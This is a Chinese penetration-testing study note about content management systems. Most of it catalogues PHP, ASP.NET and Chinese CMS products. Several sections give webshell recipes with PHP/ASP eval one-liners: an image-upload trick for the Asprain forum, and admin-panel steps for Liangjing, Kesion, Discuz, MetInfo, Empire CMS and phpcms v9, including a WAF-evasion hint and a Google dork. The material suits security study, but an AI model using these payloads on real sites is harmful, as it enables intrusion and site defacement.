渗透–CMS

网站系统又名网站CMS系统,主要用途是为了节约网站开发的成本而开发的建站系统。早期的网站系统一般叫自助建站系统。现在的网站系统又分为企业网站系统,论坛系统,门户站系统和购物网站系统。

(简单来说 就是网站的一种模板 定义了网站的框框 很多网站只是把数据放上去 页面框架并未做改变)

也叫 内容管理系统

内容管理系统(content management system,CMS)是一种位于WEB 前端(Web 服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet网站的信息。

q:为什么渗透要学CMS?

a: 许多网站用了同一种CMS 框架结构 如果某某CMS漏洞被发现 可被攻击者利用 对非常多的网站进行攻击,比如 以前的 

Asprain论坛 注册用户 上传图片就可拿到webshell    Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序 

1.txt存放你的一句话马 如:<%execute(request(“cmd”))%>

2.gif 为一小图片文件,一定要小,比如qq表情图片

3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用

4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了

5.q.asp;.gif

google:Powered by Asprain

许多网站CMS被发现漏洞但未及时更新 ,也就是版本并未升级  可以先查看 CMS的版本 查询关于这版本这类型的CMS漏洞的利用方法 对网站进行‘安全检查’,像这里拿到webshell 如果权限够的话 可以直接把网站 文件删了 (被发现就进局子) 

 

 

以下CMS框架了解即可  也可自己搭建 最好能直接分析出不同CMS之间的差别 可一眼看出网站用了什么CMS最好 

看不出? 没关系

这里有 {

识别网站cms框架的网站
识别国内网站:
识别国外网站:
 

}帮你看

 
20个PHP 的cms框架
WordPress 是一个功能强大且易于使用的内容管理系统。最初它被设计成一个博客平台。然后,它慢慢流行起来,并且可以通过一些技巧和插件定制成强大的 CMS。我写了一篇关于 SEO 插件的文章,也谈到了你应该知道的关于 WordPress 2.8 的东西。
 
Drupal 是一个用 PHP 写的免费开源的模块化框架和内容管理系统(CMS)。它被用作许多不同类型网站的后台系统,从小型个人博客到大型公司和政治网站。
 
Joomla 是一个获奖的内容管理系统(CMS),它使您能够建立网站和强大的在线应用。很多方面,包括它的易用性和可扩展性,使Joomla成为最流行的网站的软件。最好的是,Joomla是一个开源的解决方案,是免费提供给大家。
 
青蛙 CMS 简化了内容管理,提供了优雅的用户界面、灵活的页面模板、简单的用户管理和权限以及文件管理所必需的工具。
 
SilverStrip e是一个用 Sapphire 框架构建的 PHP CMS,采用 MVC 设计模式。你可以从官方网页查看构建 SilverStrip e的示例网站。
 
Mambo 是一个全功能的,屡获殊荣的,可用于一切从简单网页到复杂的企业应用程序的内容管理系统。虽然有些曼波网站已经迁移到 Joomla,但我想我应该包括曼波因为它仍然是一个伟大的 CMS。
 
TYPOlight 是一个 PHP 5 的 CMS,它有很多功能,如实时更新,跨浏览器的 CS S框架的发电机(IE7 兼容),模板为基础的前端输出,使用 Ajax 和 Web 2 技术。您应该查看主页以获取更多信息。
 
Concrete5 是一个开源的内容管理系统,有着简单的管理员界面。可以使用管理员登录后提供的编辑工具栏来编辑 Web 页面。
 
Textpattern 是另一种非常流行的内容管理系统。它需要 PHP 4 去运行大量你可以使用各种自定义的插件。
 
10. Symphony
Symphony 是一种使用 XML / XSLT 作为模板语言的 CMS。Symphony 可以让你定制你喜欢的任何东西,从网站的 URL 结构到发布环境。对于非程序员来说,这个 CMS 可能很复杂。  
 
MODx 是一个开源的 PHP 应用框架,可以帮助使用者控制自己的网上内容。它是开发人员和高级用户理想的控制系统,任何人都可以使用 MODx 发布、更新、维护动态网站,或 html 静态页面的网站内容。
 
Habari 是专门为现代 Web 开发环境编写的开源博客系统,使用现在面向对象编程技术。
 
CMS Made Simple 是一个易于使用的内容管理系统,提供多种模板下载。它的文档完善,方便查看。
 
ImpressCMS 是一个数据库(MySQL)驱动、模块化的内容管理系统,具有高度可扩展的特点,对于管理社区非常有用。
 
Exponent 使用直观灵活的内容编辑系统,允许在页面上显示网站页面。你可以在官网下载模板和主题!
 
MiaCMS 是 Mambo CMS 的分支。 它具有强大和可扩展的第三方注册系统,还有灵活的站点主题功能。 MiaCMS 支持 OpenID,有望发展成一个稳定成熟的 CMS。
 
Jojo 是一个搜索引擎友好型 CMS。除了在文章中提供 SEO 友好的 URL,Jojo 还能解决 www/non-www 问题。Jojo 还可以通过添加数据库、博客、图像库等任何你喜欢的内容来扩展功能。
 
TYPO3 是开源内容管理系统(CMS)和内容管理框架(CMF)。它具有完整的灵活性和可扩展性,同时具有成熟的现成接口,功能和模块。
 
Elxis CMS 是一个 PHP 开发的内容管理系统,主要特点包括对搜索引擎友好的 URL、安全、可调整的成员列表以及用户资料、自动化任务、设计先进、基于 Ajax 和多语言界面等。
 
Chyrp 是一个轻量级博客系统,使用 Twig 作为模板引擎,文档完整,你可以从主站点下载大量有用的模板。
 
常见cms
良精、科讯、动易、aspcms、dz
米拓cms、phpcms2008、帝国cms、phpv9
phpweb、dedecms
 
良精
方法:
1、数据库备份拿shell
         上传图片——点击数据库备份——改为脚本格式——添加账号,讲一句话添加在用户名处——备份——改为脚本格式
2、双文件上传
3、配置插马
4、修改文件上传类型直接上传
 
 
科讯(用IE)
/admin/admin.asp   后台路径
1、利用解析漏洞
2、设置——网站基本信息设置——默认允许上传文件类型,将asp改为aaspsp(会将asp替换为空)
         内容——图片添加——上传时改为aaspsp
         设置——基本设置——其它选项——通用页面目录——html/a.asp/(目录解析)——标签——自定义静态标签——增加静态标签——插入一句话——自定义页面——生成一个页面,会在a.asp目录下
 
动易(学校,简单的企业)
在网站配置中插马——连接inc/config.asp文件
数据库备份
双文件上传
 
aspcms
界面风格——编辑模板/css文件(利用IIS6.0解析漏洞)——添加——文件系统——a.asp;html——内容插入一句话
拓展功能——幻灯片设置——插马
 
dz
uckey或利用插件上传(常见的网站discuz x2.5)
后台 admin.php或cu_server
站长——ucenter设置(通过配置插马,闭合拿shell)
站长——数据库备份(或短文件漏洞)
 
米拓cms
metinfo 5.3.18                   install/phpinfo.php——里面能找到网站根目录
后台         admin/index.php (上传图片马 包含文件)
后台——安全——数据库备份——下载——打开(txt)——在完整的一句话后面写入新的一句话(select “<?php @eval($_POST[A]);?>” into outfile ‘网站根目录,路径写成Linux路径’)——恢复(一般在晚上没有数据交互的时候再做)
权限要求很高
 
帝国cms
empircms-v6.6
127.0.0.1/e/install
后台:127.0.0.1/e/admin/index.php
后台——数据表与系统模型——管理数据表——管理系统表模型——导入系统模型(要导.mod的文件)——<?fputs(fopen(“cnm.php”,”w”),”<?eval(\$_POST[cmd];)?>”)?>保存为mod文件,文件名为aa.php.mod——记住导入的目录路径/e/admin/cnm.php
注意:导入时候可能会有waf,可以在脚本中加入免杀的一句话
 
phpv9
phpcms_v9.6.3_GBK
127.0.0.1/install
后台——界面——模板风格——详情列表——search——编辑插马
后台——phpsso——系统管理——ucenter配置——uc_config.php中 ‘);eval($_post[a]);#
后台——内容——专题         phpv9低权限拿shell
 
1. We7cms(ASP.NET   2.0) 个人推荐深入研究
We7cms系统是一个Web应用框架的典范。是一款在.net平台下C#开发的开源内容管理系统 ,采用三层框架设计,适合:商业网站,企业内联网和外联网,也适合:门户网站,电子政务等,并可用他们提出的内容模型的自定义功能,定制应用软件。 就是一个字:方便!!可以更轻松地管理所有方面的项目。
笔者最看好we7cms的是无限的扩展性,就像是一个开放的平台,随意程序员的发挥,并提供全部源码,我正想改成一个适合大型门户的cms系统,发布出去,呵呵。 目前最新版是2.5版,正在火热公测…(号称可支持五种数据库:access,SqlServer,sqlite,mysql,Oracle。当然我只是试了前三种,呵呵,mysql和Oracle小弟真的不会用啊,没有试,遗憾。。。。。)
2、umbraco 
Umbraco cms系统是一款在.net平台下的开源cms系统,该系统从执行效率,页面灵活度,用户界面都充分显现人性化设计,。Net程序高手们如果不去看看,一定会后悔的,呵呵。
3、Ludico
Ludico是C#编写的居于ASP.NET 2.0的Portal/CMS系统,其cms系统的优势也很突出。你可以按照你希望的模块化设计和使用上来做文章,绝对的得心应手,或开发网站功能或做内容管理,都行。它里面有所见即所的(WYSIWYG)的编辑器和高级的用户管理等,我都很喜欢啊,推荐指数为:3星。。。。
4、ndCMS
ndCMS是 ASP.net (C#)下的一个cms系统。可以说是一个简单cms系统,上手很快,可以很快的部署一个.Net站点。但不足之处是:功能少了点.模块有:用户管理,文件管理,一个WYSIWYG编辑器,模板管理,拼写检查和内置的http压缩等,当然小的功能也不少,是初级学习者的指导师。。。
5、nkCMS
NkCMS系统使用ASP.net语言开发的,数据库是:Sql server 2000。速度快,但不是静态页面的,不知道数据量大了会不会有速度的问题,优点是:界面简洁,大方,模块不多,但都优化的挺好,没有多余的代码,也推荐一下吧,可以学习他们的代码的处理和模块嵌套等特点。
6、mojoPortal是一款C#开发cms系统,是面相对象网站框架,特点是:可以运行于Windows的ASP.NET 和GNU/Linux 或Mac OS X的Mono的平台上,这点很是先进啊,对于有些想跨平台应用的可以考虑看看,。
7、Kodai CMS
Kodai CMS也是.NET平台下的一款cms系统,也很早了,功能很多,很齐全想下载模块,产品,文章,并提供各种常用的论坛,博客的整合接口,看藏得很深,不明白为什么,呵呵,。
8、Go.Kryo
Go.Kryo是一个用ASP.NET(C#).NET和 Microsoft SQL Server 的简单的cms系统,很简单,推荐想学习.net的新手看看,肯定有帮助,如果我刚学的时候就发现了他,会省不少的事儿了,。
9、Amplefile
Amplefile是一款内容管理系统,是.Net环境下的windows应用程序,使用了.Net remoting.
10、 DotNetNuke(ASP.NET   2.0)
DotNetNuke,也是.net的一款不错的cms系统,全部开源,功能很强大,不管是对商业网站,企业内联网和外联网,还是对门户网站,都是一个不错的选择,可定制垂直应用方便用使用户可以更轻松地管理所有方面的项目。可以说是一个Web应用框架的理想境界。
 
动易–这套是国产AspCMS中非常强大的系统,一路走来,动易不断完善,而且也不断加强功能,包括个人版,学校版,政府版,企业版,后台包括的功能,信息发布,类别管理,权限控制,信息采集,而且跟第三方的程序,比如论坛,商城, blog可以完美结合,基本上可以满足一个中大型网站的要求,但Asp和Access的的局限性,还有本身功能Dll的限制,使得免费版差不多成鸡肋。这套系统比较适合非专业人士使用,在使用操作方面做的非常人性话,而如果说想自己修改或者二次开发的话就有点免为其难了。
  2.风讯– 风讯的系统功能强大,自由度高,是现在人气比较高的系统之一,可以根据自己的想法做出一个网页从而建立一个有自我风格的网站,更新速度快,一直有新的版本出现,现在又开放采集、下载、投稿、图片整站管理系统,第三方整合等功能,开源是它最大特点,希望保持。然后缺点就是后台人性化差了一点,上手有点难度,而且连一套默认的模板都没有,因为自由度太高了,让一些新手更难上手,还有就是免费版的生成静态发布的效率不高。
  创力— 创力是一套无任何文件加密,不需要注册组件,不需要绑定域名,经过完善设计、精心打造的一个适用于各种服务器环境的安全、稳定、快速、强大、高效、易用、优秀的网站建设解决方案。系统功能齐全,集成文章、下载、图片、影视、商城、留言、用户等大模块,并可无限制N个与文章、下载、图片等模块相同的的模块,每个模块下更可无限栏目分类,加上Rss订阅、公告、广告、统计、关键字、友情链接、JS代码、站点地图……等等,综合来说是一套不错的网站系统
  3.JTBC– JTBC也是新出不久的一套可对现有模块进行扩充与克隆的网站系统核心,采用UTF-8编码,是目前ASPCMS界中唯一一款真正意义上做到代码与程序全脱离的程序,似乎采用了xml的散存储技术,而且在代码与程序脱离的技术上,又加人了语言与代码脱离,语言与程序脱离的两两脱离关系,基于这种特性,JTBC就具有了非常强大的可扩充性和可二次开发性,目前具有文章系统,下载系统,商城系统三大传统模块,有友情链接,在线支付,网站留言,网站评论等常规管理项目,JTBC可能对于未上手的人来说是一套很头大的系统,但对于熟悉的人而言使用起来非常有效率,做企业网站与其他网站均可。
  4.TSYS—对于一个免费开源,没有版权的CMS来说我们也没有什么可要求的!在TSYS的各个版本中均没有出现过重大的安全漏洞而且对于目前1.1来说已经是很完善成熟的了,TSYS和一般的Asp 的CMS不大一样,他的功能并非由本身而定,而是根据使用者的能力而定。使用者越厉害 TSYS本身也可以变的更厉害。强大的诸如碎片等的信息管理,可以将信息在显示的时候重新整合,说白了就是只有对TSYS非常熟悉的人才可以将TSYS的优势发挥出来,因此,光就这点也就注定了TSYS流行不起来,除非具有人性话操作的修改版本出来。
  5.乔客– 这个系统已经很久了,但好像一直存活在动易和风讯两者之间,现在3.0的Joekoe CMS出来了,但另我比较失望,相比免费版的1.2,功能是增强了,但也Dll,这个可能也是国产程序的一个特色罢了。它本身已经是一个融合度非常高的系统,有商城,新闻,下载,论坛,留言,影视,博客圈等,感觉有那么点WEB2.0 的味道,不想怎么修改的朋友直接拿去就可以用了。
  6.科汛–科汛是一套新出的网站系统,其功能非常强大,目前主流网站的功能在其系统内均能实现,具有强大的标签(JS)管理功能,个性化的标签(JS)参数配置功能,做一个个性的大站不再是梦想。网站整体开源,具有文章模块,图片模块,下载模块,动漫模块,音乐模块,会员模块,采集模块等等,功能非常不错。
  7.新云–新云最初做的是下载站,后来转为多模块的系统,最近发现有不少的网站都在使用。由文章、下载、商城、留言、用户管理五大功能模块和广告、公告、连接、统计、采集、模板管理、数据库管理等多个通用模块组成,而且功能确实有一些值得称道的地方,不过又是DLL的,免费版有不少的限制,但对一个简单基本的网站来说,功能够用了。
 
十款常见的PHP+MySql类免费CMS系统
 
1. DEDECMS
一款国内开源的cms,作者是一个个人,能做出如此功能的cms,是相当不错的。2007版功能十分强大,希望能改善之前数据量一大,更新静态页就很慢的缺点。因为开源,有较多的玩家和拥护者。非常适合有一定编程基础的站长。
官方网站: dedecms.com
2. phpcms
一个综合的网站管理系统,由PHP+MYSQL构架全站生成html,能够快速高效地应用于LINUX和WINDOWS服务器平台,是目前中国LINUX环境下最佳的网站管理应用解决方案之一。据传被酷6收购。
官方网站: phpcms.cn
3. 帝国网站管理系统
Ecms全称为“帝国网站管理系统”,英文译为“Empire CMS”简称“Ecms”.Ecms是基于B S结构,且功能强大而易用的网站管理系统。是一个经过完善设计的适用于Linux windows Unix等环境下高效的网站解决方案。
官方网站: phome.net
4. php168
PHP168整站系统,代码全部开源,可方便的进行二次开发,功能模块可以自由安装与删除,个人用户免费使用。系统频道模块很多,适合作个人门户网站。较多页面没有生成静态页。如果你想建站,就义无反顾的选择它吧!!!
官方网站: php168.com
5. HBcms
一个以PHP官方网站推荐的PEAR+SMARTY技术架构的cms,比较容易上手,适合没经验的新人做网站。没有下载,分类信息等模块,适合做文章为主的网站。全站生成静态页,默认附带了几套模板,可以方便的更换模板。个人企业都免费,无需授权。
官方网站: hbcms.com
6. SupSite
一款将论坛资源自动转换成门户网站的php程序系统,使用SupeSite,并利用你现有的论坛,你将自动拥有一个功能完备的,资源丰富的站点系统;由论坛变成网站,一切都是自动完成,你不需要任何干涉。让你轻轻松松实现建立网站的目的。
官方网站: supsite.net
7. 曼波
MAMBO,一个国外的CMS系统,功能很强大,支持添加很多组件,模块;拥有丰富的模板.Mambo是一个网站内容管理系统(CMS),它是网站的后台引擎,使网站内容的创建、管理和共享更加简易。Mambo十分强大,但官方网站网站也承认,它不是典型的“门户”网站解决方案。
官方网站:mamboserver.com
8. Joomla!
是一套在国外相当知名的内容管理系统,2007年开源cms第一名!Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、Windows、MacOSX等各种不同的平台上执行。操作接口除了美观之外,也花了很多心力在设计这些接口的简易操作性。但初次使用者,需要花一点时间学习一下操作的方式,才能运用自如。。
官方网站: joomla.org
9. Drupal
是一个强大的软件,它可以让个人或社区使用者很容易地发表、管理并组织一个网站里大量且多样的内容。已经有许多个人和组织采用Drupal来建立各种不同的网站。Drupal是一套采用GPL授权的开放源码软件,是由数以千计的使用者和开发人员所共同维护和开发的。
官方网站: drupal.org
10. WordPress
是一款基于PHP和MySQL的Blog软件,但是它也可以当作简单的cms系统来用。通过它可以快速而简便的搭建属于你自己的Blog(网站)平台。简而言之,这个Wordpress就相当于咱们用来搭建论坛的那些程序,比如用在自留地上的雷傲,还有别的比如PHPBB等等…Wordpress因为它的安装简单和可扩展性好几乎已经成了独立搭建Blog平台的第一选择。Wordpress还有一个MU就是多用户的版本,支持多用户的Blog系统。
官方网站: wordpress.org
 

 

版权声明:本文为Arg1nt原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/Arg1nt/p/basis_2.html